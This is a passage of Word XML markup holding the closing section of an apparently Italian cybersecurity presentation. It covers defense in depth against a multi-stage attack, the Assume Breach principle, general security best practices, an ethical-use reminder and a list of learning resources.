        <w:t xml:space="preserve">Esempio pratico nel contesto del nostro multi-stage attack: se avessimo avuto prepared statements (livello applicazione), la SQL injection sarebbe stata bloccata al punto 2 e l'intera catena si sarebbe fermata. Se le password fossero state hashate (livello dati), anche ottenendo il dump, le credenziali sarebbero state inutilizzabili. Se ci fosse stata la 2FA (livello utente), anche con le credenziali, l'accesso admin sarebbe stato bloccato. Se i dati fossero stati cifrati at rest (livello dati), il dump non avrebbe contenuto informazioni leggibili. Se ci fosse stato un IDS (livello rete), il traffico anomalo verso il server C2 sarebbe stato rilevato e bloccato.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Principio Assume Breach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il paradigma moderno della sicurezza si basa sul principio 'Assume Breach' (assumi che sarai compromesso): invece di cercare di costruire un perimetro impenetrabile, si progetta il sistema assumendo che prima o poi un attaccante riuscira' a entrare. L'obiettivo diventa: minimizzare il danno che un attaccante puo' fare una volta dentro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo approccio si traduce in: segmentazione della rete (limitare il lateral movement), crittografia dei dati sensibili (rendere i dati inutili anche se rubati), monitoraggio continuo (rilevare rapidamente attivita' sospette), piani di incident response (sapere cosa fare quando si viene compromessi), backup regolari e testati (poter ripristinare i sistemi rapidamente), principio del minimo privilegio (ogni utente e servizio ha solo i permessi strettamente necessari).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Best Practices Generali di Sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation: validare OGNI input lato server (tipo, lunghezza, formato, range). Mai fidarsi del client. Usare whitelist quando possibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Output encoding: codificare l'output nel contesto appropriato (HTML, JavaScript, URL, CSS). Usare librerie consolidate, non soluzioni fatte in casa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS ovunque: cifrare tutte le comunicazioni con TLS. Usare HSTS (HTTP Strict Transport Security) per forzare HTTPS. I certificati sono gratuiti con Let's Encrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aggiornamenti tempestivi: applicare patch di sicurezza il prima possibile. Monitorare le CVE (Common Vulnerabilities and Exposures) per le tecnologie in uso. Usare strumenti come Dependabot per le dipendenze.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Logging e monitoring: registrare tutti gli eventi di sicurezza (login falliti, errori, accessi a risorse sensibili). Monitorare i log per anomalie. Implementare alerting per eventi critici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Principio del minimo privilegio: ogni utente, servizio e componente dovrebbe avere solo i permessi strettamente necessari. Un'applicazione web non dovrebbe avere accesso root al database se deve solo leggere una tabella.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Formazione e awareness: la sicurezza e' responsabilita' di tutti, non solo del team IT. Gli utenti devono essere formati a riconoscere phishing, social engineering, e pratiche insicure.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CONCLUSIONE</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La cybersecurity non e' un prodotto ma un processo continuo. Le minacce evolvono costantemente e le difese devono evolversi con esse. I principi fondamentali restano: mai fidarsi dell'input, difesa in profondita', minimo privilegio, assume breach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ogni sviluppatore e' anche un professionista della sicurezza. Scrivere codice sicuro non e' un'opzione ma una responsabilita' verso gli utenti che si affidano ai nostri sistemi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le tecniche e gli attacchi studiati in questa presentazione non devono mai essere usati per scopi illegali. La conoscenza delle vulnerabilita' serve per costruire sistemi migliori, non per danneggiare quelli altrui. L'hacking etico (penetration testing autorizzato) e' l'unico modo legale e professionale di applicare queste competenze.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Risorse per Approfondire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP (owasp.org): guide, strumenti e standard per la sicurezza delle applicazioni web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy (portswigger.net/web-security): corso gratuito online con laboratori pratici su tutte le vulnerabilita' web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST Cybersecurity Framework: framework di riferimento per la gestione del rischio cyber.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: knowledge base di tattiche e tecniche di attacco basata su osservazioni del mondo reale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE (Common Weakness Enumeration): catalogo di debolezze software e hardware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox e TryHackMe: piattaforme di laboratori pratici per apprendere la sicurezza informatica in modo legale e strutturato.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2026-05-18T14:02:20.671Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T14:02:20.673Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>